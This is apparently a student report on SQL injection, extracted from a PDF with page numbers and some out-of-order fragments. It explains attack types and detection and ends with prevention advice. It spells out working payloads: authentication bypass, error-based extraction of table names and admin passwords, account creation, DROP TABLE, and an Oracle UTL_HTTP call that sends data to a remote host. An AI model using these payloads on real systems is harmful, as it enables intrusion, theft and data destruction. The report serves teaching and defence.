This action might not be possible to undo. Are you sure you want to continue?
The World Wide Web has experienced remarkable growth in recent years. Businesses, individuals, and governments have found that web applications can offer effective, efficient and reliable solutions to the challenges of communicating and conducting commerce in the Twenty-first century. However, the security of Web applications has become increasingly important in the last decade. With more and more Web-based applications deal with sensitive financial and medical data, it is crucial to protect these applications from hacker attacks. A security assessment by the Application Defense Center, which included more than 250 Web applications from e-commerce, online banking, enterprise collaboration, and supply chain management sites, concluded that at least 92% of Web applications are vulnerable to some form of attack. Much vulnerability in web applications is caused by permitting unchecked input to take control of the application, which an attacker will turn to unexpected purposes. SQL Injection is the most common type of technique used. Beside SQL Injection the other type of attacks are: • • • • • • • • Shell injection. Scripting language injection. File inclusion. XML injection. SQL Injection XPath injection. LDAP injection. SMTP injection.
What is SQL Injection?
SQL Injection is a technique to hack the database. It is a type of security exploit in which the attacker adds the SQL code to a Web form input box to gain access to resources or make changes to data. What are SQL Injection attacks? An SQL injection attack is an type of attack where a user of your form enters a piece of SQL code into it, and wraps it in special characters in such a way that the data entered doesn't get used for the purpose you had intended, instead it gets used to corrupt or destroy your database. When attacker enters the data into the form, that data is directly used to build a dynamic SQL query to retrieve the data from database. Such malicious code injection is called as an SQL Injection attack. There are two form of SQL Injection attacks : 1. Form Injection. 2. URL Injection. What’s vulnerable? A web application is vulnerable to SQL injection for only one reason – end user string input is not properly validated and is passed to a dynamic SQL statement. The string input is usually passed directly to the SQL statement. However, the user input may be stored in the database and later passed to a dynamic SQL statement. Because of the stateless nature of many web applications, it is common to write data to the database between web pages. This indirect type of attack is much more complex and requires indepth knowledge of the application. What’s not vulnerable? SQL Statements using bind variables are generally immune to SQL Injection attacks as the Oracle database will use the value of the bind variable exclusively and not interpret
[Stephen Kost. Bind variables should be extensively used for both security and performance reasons.SQL Injection the contents of the variable in any way. "An Introduction to SQL Injection Attacks for Oracle Developers"] 3 . PL/SQL and JDBC allow for bind variables.
For example. Suppose the user supplied the Username =”Admin” and Password=”magic”. the attacker can trick the web application into forwarding a malicious query to the database.SQL Injection Working of SQL Injection The principles behind a SQL injection are simple and these types of attacks are easy to execute and master. The values supplied in the field “Username” and “Password” are directly used to build the SQL Query like : SELECT * FROM customers WHERE name = ‘ & name & ’ AND password = ‘ & password’ Now. To exploit a SQL injection flaw. By carefully embedding malicious SQL commands into the content of the parameter. The query will become : SELECT * FROM customers WHERE name = ‘Admin’ AND password = ‘magic’ This will work with no problem. consider the login form which accepts the username and password from the user. the attacker must find a parameter that the web application passes through to a database. But suppose the user supplied some poorly devised string of code then that will allow the attacker to by-pass the authentication and access 4 .
Ignore anything that follows on this line.e. It Works as follows: ‘ OR 1=1 -: Closes the user input field. if user supplied username=’ OR 1=1—then the query will be passed as : SELECT * FROM customers WHERE name = ‘’ OR 1=1--’ AND password = ‘ ’. : Comments outs the rest of the lines so that it won’t be processed. : Continues the SQL query so that the process should equal to what come before OR what come after. And Because the application is not really thinking about the query . The code that refers to the password input field is never run by the server and therefore does not apply. Some more examples : Example 1: Getting a column name from database error message.our use of OR has turned a single-component WHERE clause into a two-component one.merely constructing a string . The data we're filling is used the WHERE clause. Seeing as 1 will always equal 1. The query means that “Select everything from the table customers if the name equals “nothing” Or 1=1. : A statement which is always true. Consider the a login form supplied with following arguments : Username: ' having 1=1 --Password: [Anything] 5 . the server has received a true statement and is fooled into allowing an attacker more access than they should have.SQL Injection the information from the database. i. and the 1=1 clause is guaranteed to be true no matter what the first clause is.
the SQL query causes ASP to spit the following error to the browser: “Microsoft OLE DB Provider for SQL Server (0x80040E14) Column 'users.userName LIKE 'a%' --' and userPass='' The query grabs the userName field of the first row whose userName field starts with ‘a’. line 16” This error message now tells the unauthorized user the name of one field from the database that application is trying to validate the login credentials against: users. the attacker must have the information about the table name and column names it that table. /login.userName LIKE 'a%' -Password: [Anything] This performs an injected SQL query against our users table: SELECT userName FROM users WHERE userName='' OR users. First the user supply a input at username field like: Username: ' having 1=1-This provokes the following error: 6 .userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. attacker can now use SQL Server's LIKE clause to login with the following credentials: Username: ' OR users. For that the user might use the following technique. Using the name of this field.SQL Injection When the user clicks on the submit button to start the login process. Example 2: Creating a new username and password. username.asp. To create a new user record.
users.privs having 1=1-… which produces no error.id.password. This can be achieved using a 'type conversion' error message. like this: Username: ' union select sum(username) from users-7 .username. line 35 Eventually the attacker arrives at the following Username : ' group by users. users. and is functionally equivalent to: select * from users where username = '' So the attacker now knows that the query is referencing only the 'users' table. in that order. privs'. They can continue through the columns by introducing each field into a 'group by' clause. /process_login.asp. line 35 So the attacker now knows the table name and column name of the first column in the query.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login. as follows: Username: ' group by users. It would be useful if he could determine the types of each column.asp. password.id having 1=1-The above input generates the following error: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users. username. users.SQL Injection Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users. and is using the columns 'id.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
which tells us that the 'username' field has type 'varchar'. Attempting to calculate the 'sum' of a textual field results in this message: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. line 35 . we get an error message telling us that the number of fields in the two rowsets don't match: Username: ' union select sum(id) from users-Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. This allows the attacker to create a well . like this: Username: '. line 35 We can use this technique to approximately determine the type of any column of any table in the database. insert into users values( 666. on the other hand. /process_login.asp. 'foobar'.SQL Injection This takes advantage of the fact that SQL server attempts to apply the 'sum' clause before determining whether the number of fields in the two rowsets is equal. /process_login. 'attacker'. we attempt to calculate the sum() of a numeric type.formed 'insert' query.. If. 0xffff )-- 8 .asp.
we would see the following error: Microsoft OLE DB Provider for SQL Server (0x80040E37) Invalid object name 'users'. Secondly. “Advance SQL Injection”. Username: ' OR 1=1.asp. it would select the userName field for all rows in the users table. For example. Several databases use semicolon (. The use of a semi-colon allows multiple queries to be submitted as one batch and executed sequentially. /login.SQL Injection Example 3 :Dropping a table from database.htm] [ Chris Anley. line 16 [http://www. it would delete the users table.sitepoint. DROP TABLE users.) to delimit a query. so that when we went to login next time. The attacker might use this to inject the database.com/article/sql-injection-attacks-safe. -Password: [Anything] Then the query would execute in two parts.2002] 9 . Firstly.
If the user provided the correct email id with no extra code then the query will run properly.SQL Injection Types of SQL Injection attacks The SQL Injection attacks are basically divided into 2 types : 1. SELECT email. the database will return information of any user where the name starts with “Bob”. login_id. stored in database) and then later retrieved. suppose a form ask the email id of the user. Second Order attacks First Order attacks First order attacks are those attacks when the attacker receives the desired result immediately. For example.g. such as E-mail. Here. this type of attacks are called first order attacks. passed. First Order attacks 2. temporarily cached. logged. Second Order attacks A Second order attack can be classified as the process in which the malicious code is injected into a web-based application and not immediately executed. but is stored by application (e. As. full_name FROM members WHERE email=’ x’ OR full_name LIKE ‘%Bob%’. either by direct response from the application they are interacting with or through some other response mechanism. rendered or executed by the victim. the attacker is getting the result immediately. But suppose if the user enter a “LIKE” clause with the email id then the database will return the matching criteria to the user immediately. 10 .
DELETE Orders.aspx] 11 . [http://www. FriendlyName.SQL Injection This type of attacks often occurs because once data is in the database. which forms a new SQL command and executes that. '''. 'My Attack'. For example. the data is retrieved to the application.-It will return no results for the expected query. These types of attacks are known as second order attacks. it is often thought of as being clean and is not checked again. if the user types the following as the search criteria: '. Consider an application that permits the users to set up some favourite search criteria. However. It is this second query which is the victim of the attack. When the user defines the search parameters.com/KB/database/SqlInjectionAttacks. when fully expanded. However.codeproject. However. when the user selects their favourite search. The second query to the database. the data is frequently used in queries where it can still cause harm. now looks like this: SELECT * FROM Products WHERE ProductName = ''.DELETE Orders.--') which is entered into the database without problems. the application escapes out all the apostrophes so that a first-order attack cannot occur when the data for the favourite is inserted into the database. Criteria) VALUES(123. when the user comes to perform the search.-The application takes this input and escapes out apostrophe so that the final SQL statement might look like this : INSERT INTO favourites (UserID. the data is taken from the database and used to form a second query which then performs the actual search. but the company has just lost all of their orders. DELETE Orders.
12 . http://example/article. sometimes the server returns an error page to the user which describes the type and cause of the error in detail. Normal SQL Injection 2. Blind SQL Injection Normal SQL Injection In this type of attacks. This tells the attacker that he must now guess the correct number of columns for his SQL statement to work.asp?ID=2+union+all+select+name+from+sysobjects The SQL server then may return the database error similar to this : Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft] [ODBC SQL Server Driver] [SQL Server] All queries in the SQL statement containing a UNION operator must have an equal number of expressions in their target lists. the attacker can try to match his query with the developers query by using the information contained in the error messages returned in response by the database server. when an attacker tries to execute SQL Query. They are 1. Thus.SQL Injection Methods of SQL Injection There are two methods for attacking through SQL Injection. the attacker can test to see if he can gain access to the database: For example. By appending a union select statement to the parameter.
• Detecting Blind SQL Injection Executing the following request to a web site: http://example/article. An attacker can still steal data by asking a series of True and False questions through SQL statements.SQL Injection Blind SQL Injection Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application. Executing the following request to a web site: http://example/article. This is because the SQL statement "and 1=0" is always false.asp?ID=2+and+1=0 would then cause the web site to return a friendly error or no page at all. Once the attacker discovers that a site is susceptible to Blind SQL Injection. 13 . This makes exploiting a potential SQL Injection attack more difficult but not impossible. they get a generic page specified by the developer instead. in some cases. he can exploit this vulnerability more easily.asp?ID=2+and+1=1 Should return the same web page as: http://example/article.asp?ID=2 because the SQL statement 'and 1=1' is always true. rather then getting a useful error message. than by using normal SQL Injection.
INTERSECT.SQL Injection Categories Of SQL Injection Attacks There are four main categories of SQL Injection attacks against databases. There are other possible variations. The classic SQL manipulation is during the login authentication. or MINUS. the WHERE clause is true for every row and the attacker has gained access to the application. Function Call Injection 4. The attacker attempts to modify the existing SQL statement by adding elements to the WHERE clause or extending the SQL statement with set operators like UNION. Code Injection 3. SQL Manipulation 2. They are: 1. but these are the most significant examples. 14 . Buffer Overflows SQL Manipulation The most common type of SQL Injection attack is SQL manipulation. A simplistic web application may check user authentication by executing the following query and checking to see if any rows were returned – SELECT * FROM users WHERE username = 'bob' And PASSWORD = 'mypassword' The attacker attempts to manipulate the SQL statement to execute as: SELECT * FROM users WHERE username = 'bob' AND Password = 'mypassword' or 'a' = 'a'-Based on operator precedence.
but also all the database users in the application.SQL Injection The set operator UNION is frequently used in SQL injection attacks. Thus. Code Injection Code injection attacks attempt to add additional SQL statements or commands to the existing SQL statement. but seldom works with an Oracle database. In PL/SQL and Java. The goal is to manipulate a SQL statement into returning rows from another table. Oracle does not support multiple SQL statements per database request. A web form may execute the following query to return a list of available products: SELECT product_name FROM all_products WHERE product_name like '%Chairs%' The attacker attempts to manipulate the SQL statement to execute as: SELECT product_name FROM all_products WHERE product_name like '%Chairs' UNION SELECT username FROM dba_users WHERE username like '%'. This statement will result in an error: SELECT * FROM users WHERE username = 'bob' AND Password = 'mypassword'. DELETE FROM users WHERE username = 'admin'. This type of attack is frequently used against Microsoft SQL Server applications. The list returned to the web form will include all the selected products. 15 . the following common injection attack will not work against an Oracle database via a PL/SQL or Java application. The EXECUTE statement in SQL Server is a frequent target of SQL injection attacks – there is no corresponding statement in Oracle.
000 functions in about 175 standard database packages. which are vulnerable to code injection. Function Call Injection Function call injection is the insertion of Oracle database functions or custom functions into a vulnerable SQL statement. Functions executed as part of a SQL SELECT statement can not make any changes to the database unless the function is marked as “PRAGMA TRANSACTION”. UPDATE. PL/SQL and Java applications can dynamically execute anonymous PL/SQL blocks. Functions executed in INSERT. The above example PL/SQL block executes an application stored procedure that encrypts and saves the user’s password. END. The following is an example of a PL/SQL block executed in a web application – BEGIN ENCRYPT_PASSWORD('bob'. By default. Some of these functions do perform network activities which can be exploited. some programming languages or APIs may allow for multiple SQL statements to be executed. 'mypassword'). Oracle supplies over 1. 'mypassword'). DELETE FROM users WHERE upper(username) = upper('admin'). 16 . The Oracle database allows functions or functions in packages to be executed as part of a SQL statement.SQL Injection However. An attacker will attempt to manipulate the PL/SQL block to execute as – BEGIN ENCRYPT_PASSWORD('bob'. although only a few of these functions may be useful in a SQL injection attack. END. Any custom function or function residing in a custom package can also be executed in a SQL statement. These function calls can be used to make operating system calls or manipulate data in the database. or DELETE statements are able to modify data in the database. None of the standard Oracle functions are executed as autonomous transactions.
1/') || ''. This SQL statement is not vulnerable to other types of injection attacks. SELECT TRANSLATE('user input'.g.REQUEST('http://192. The attacker could manipulate the string and URL to include other functions in order to retrieve useful information from the database server and send it to the web server in the URL. '0123456789') FROM dual. There is no direct equivalent of the TRANSLATE database function in Java. The changed SQL statement will request a page from a web server. Application developers will sometimes use database functions instead of native code (e. '0123456789') FROM dual. The issue with function call injection is that any dynamically generated SQL statement is vulnerable. an attacker can send information from the database to a remote computer or execute other attacks from the database server. '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'. but is easily manipulated through a function injection attack. so the programmer decided to use a SQL statement.SQL Injection Using the standard Oracle functions. Many native Oracle applications leverage database packages which can be exploited by an attacker.168. The following example demonstrates even the most simple of SQL statements can be vulnerable. Since the 17 . These custom packages may include functions to change passwords or perform other sensitive application transactions. The attacker attempts to manipulate the SQL statement to execute as: SELECT TRANSLATE('' || UTL_HTTP. Even the simplest SQL statements can be effectively exploited.1.. '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'. Java) to perform common tasks.
A buffer overflow attack using tz_offset. 18 . or numtodsinterval is executed using the function injection methods described previously. it can write to the database even in a SELECT statement. bfilename. it could also be used to attack other servers on the internal network. '0123456789') FROM dual. Known buffer overflows exist in the standard database functions like: tz_offset to_timestamp_tz bfilename. By exploiting the buffer overflow via a SQL injection attack. remote access to the operating system can be achieved. Executing the above SQL statement. to_timestamp_tz.adduser('admin'. from_tz numtoyminterval numtodsinterval. An example would be a custom application has the function ADDUSER in the custom package MYAPPADMIN. 'newpass') || ''. SELECT TRANSLATE('' || myappadmin. Buffer Overflows A number of standard Oracle database functions are susceptible to buffer overflows. from_tz.SQL Injection Oracle database server is most likely behind a firewall. Since it is marked “PRAGMA TRANSACTION”. '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'. the attacker is able to create new application users. so it could be executed under any special circumstances that the application might encounter. which can be exploited through a SQL injection attack in an un-patched database. The developer marked the function as “PRAGMA TRANSACTION”. numtoyminterval. Custom functions and functions in custom packages can also be executed.
"An Introduction to SQL Injection Attacks for Oracle Developers"] 19 . [Stephen Kost. thus making this a very effective denial of service attack. most application and web servers do not gracefully handle the loss of a database connection due to a buffer overflow. the web process will hang until the connection to the client is terminated. Usually.SQL Injection In addition.
and watch the address bar until you find a URL that has parameters.asp?id=42). Go to the address bar. look for these files specifically.com/articleid.SQL Injection Detection Of Vulnerability To detect whether your application is vulnerable to SQL injection attacks. http://www. click your cursor. It should now look like “name=val’ue” Step 5 Step 6 : Click the ‘GO’ button to send your request to the Web Server. one having parameter values. Step 4 : Here is where the actual testing for hacker protection takes place. Highlight the word value in “name=value”). There are 2 methods for testing script for SQL injection. Most SQL injection problems are present when the file extensions are “. click the link. and put a single quote (‘) in the middle of the value. Method 1. When trying to test a site for SQL injection vulnerabilities. and replace it with a single quote (‘). Be sure to test each parameter value one at a time with both methods. you should now see the URL that was seen in the status bar. Most database error messages will look similar like: 20 . click your cursor. : Analyse the response from the Web server for any error messages. Go to the address bar. and go to that page. Step 3 : Once a URL with parameters has been found.asp” or “. Try to find a URL with parameters in it (Ex. : Mouse over the links of the Web site with your cursor while paying attention to the bottom status bar. follow the given steps: Step 1 Step 2 : Open the Web site in a browser. You will notice the URLs that the links point to. In the address bar.site. And if you don’t see any URLs in the status bar. It should now look like “name=’ ”. Method 2. and highlight a parameter value (Ex.cfm”. then just click on links.
SQL Injection Example Error 1: Microsoft OLE DB Provider for SQL Server error '80040e14'Unclosed quotation mark before the character string '51 ORDER BY some_name'. line 5 Example Error 2: ODBC Error Code = S1000 (General error [Oracle][ODBC][Ora]ORA-00933: SQL command not properly ended. then the Web site is vulnerable to SQL injection. click the ‘View’ menu. In Notepad.asp. click the ‘Edit’ menu. If Either Step 6 or 7 is successful. in the text box and then click ‘Find Next’. A dialog box will appear that will ask you to 'Find What’. you must view the HTML source of the page and search for the error./some_directory/some_file. and select the ‘Source’option. This will cause Notepad to open with the HTML source of the page. 21 . Type the phrase ‘Microsoft OLEDB’ (ODBC). To look for it. and select ‘Find’. Step 7 : Sometimes the error message is not obvious and is hidden in the source of the page. To do this in Internet Explorer.
data or database server. Use Bind Variables The most powerful protection against SQL injection attacks is the use of bind variables. SQL Injection attacks can be easily defeated with simple programming changes. Following are some techniques that can be used to prevent SQL Injection attacks : 1. A single unprotected SQL statement can result in comprising of the application. Dynamic construction of SQL statements with out use of proper type safe parameters. developers must be disciplined enough to apply the following methods to every web accessible procedure and function. No SQL statement should be created by concatenating together strings and passed parameters. Application coding standards should require the use of bind variables in all SQL statements. Some of the common mistakes which make your application susceptible to SQL Injection attacks are: Weak input validation. Every dynamic SQL statement must be protected. Using bind variables will also improve application performance. A very complex SQL injection attack could possibly exploit an application by storing an attack string in the database. 22 . which would be later executed by a dynamic SQL statement. This is Oracle’s internal coding standard and should also be your organization’s standard. Use of over privileged database logins. Bind variables should be used for every SQL statement regardless of when or where the SQL statement is executed. however.SQL Injection Preventing SQL Injection Attacks SQL Injection attacks normally occur due to unfiltered user input or some over-privileged database logins.
Many web applications use hidden fields and other techniques. it should be rejected and error message should be returned to the user. 3. If the data fails to pass the validation process. Many of these functions can be used effectively in an attack. Limit The Open-Ended Input 23 . special database characters must be removed or escaped. Oracle is delivered with hundreds of standard functions and by default all have grants to PUBLIC. The simplest method is to escape all single quotes – Oracle interprets consecutive single quotes as a literal single quote. If a bind variable is not being used. Input validation should be applied first at the client level. Validate The Input Every passed string parameter should be validated. All functions that are not absolutely necessary to the application should be restricted. The use of bind variables and escaping of single quotes should not be done for the same string.SQL Injection 2. the only character at issue is a single quote. A bind variable will store the exact input string in the database and escaping any single quotes will result in double quotes being stored in the database. The application may have additional functions which perform operations like changing passwords or creating users that could be exploited. 4. The data passed from the client form must be checked for input validation at the server level before submitting the query to the database server for execution. For Oracle databases. Function Security Standard and custom database functions can be exploited in SQL injection attacks. which also must be validated.
8. new line in all strings from user input and parameters from URL. Verify The Type Of Data Verify the data type using ISNUMERIC or equivalent function before passing it into a SQL statement. Good string = replace(input string. 11.'. Length of the user input should be limited. For validation only the option in the select box should be taken up and any other option should be rejected. with SQL statements. Never build dynamic SQL statement directly from the user input and never concatenate user input. extended characters like NULL. Some Useful Tricks 24 . ' -Meaning Query Delimiter. Character Data String Delimiter Single Line Comment. 5. 10. by using select boxes instead of Text boxes. backslash.''). Filter out characters like slash. Whenever possible reject input that contains following potentially dangerous characters : Character . Application must apply client side validation for all inputs. 9. For string data replace single quotes with two single quotes using the replace function or equivalent. which is not validated. 6. xp_sendmail. Stored procedures that are not being used may be deleted such as: master_xp_cmdshell. Privileges of the user account used in the application for executing SQL statements on the database must be defined. xp_startmail. carry return. sp_makewebtask.SQL Injection Try to limit the open-ended input wherever possible. Use Stored Procedures Use stored procedures avoid direct access to the table. 7.
This will produce an error. Our query: SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. The server will display the following error: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. we can use the following query: 25 . To get the next table name. we have obtained the first table name in the database.asp.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-The system table INFORMATION_SCHEMA. When we UNION this string value to an integer 10. How to get data from the database using ODBC error message ? We can use information from error message produced by the MS SQL Server to get almost any data we want.TABLES contains information of all tables in the server. /index. In this case. The TABLE_NAME field obviously contains the name of each table in the database. since we cannot convert nvarchar to int.asp?id=10 We will try to UNION the integer '10' with another string from the database: http://duck/index. line 5 The error message is nice enough to tell us the value that cannot be converted into an integer. Take the following page for example: http://duck/index. which is “table1". It was chosen because we know it always exists.SQL Injection 1.TABLES-This should return the first table name in the database. MS SQL Server will try to convert a string (nvarchar) to an integer.
asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. /index.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.asp. line 5 26 .TABLES WHERE TABLE_NAME NOT IN ('table1')-2.SQL Injection http://duck/index. How to get all column names of a table? We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table: http://duck/index.COLUMNS WHERE TABLE_NAME='admin_login'-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. we can use NOT IN () to get the next column name: http://duck/index.asp.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. line 5 Now that we have the first column name. /index.
/index. /index. How to retrieve any data? Now that we have identified some important tables. line 5 We can now login as "neo" with his password "m4trix".asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int. we can use the same technique to gather any information we want from the database.asp. and their column.asp. Finally. to get the password of "neo" from the database: http://duck/index. let's get the first login_name from the "admin_login" table: http://duck/index. Now.SQL Injection 3. [http://www.securiteam.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.com/securityreviews/] 27 . line 5 We now know there is an admin user with the login name of "neo".
SQL Injection Conclusion SQL Injection is an attack methodology that targets the data residing in a database through the firewall that shields it. Prevention involves enforcing better coding practices and database administration procedures. Remember always patch and update holes because exploits are found commonly and the attacker is not going to wait. Database footprinting is the process of mapping out the tables on the database and is a crucial tool in the hands of an attacker. Exploits occur due to coding errors as well as inadequate validation checks. 28 . It attempts to modify the parameters of a Web -based application in order to alter the SQL statements that are parsed to retrieve data from the database.
This action might not be possible to undo. Are you sure you want to continue?
We've moved you to where you read on your other device.
Get the full title to continue reading from where you left off, or restart the preview.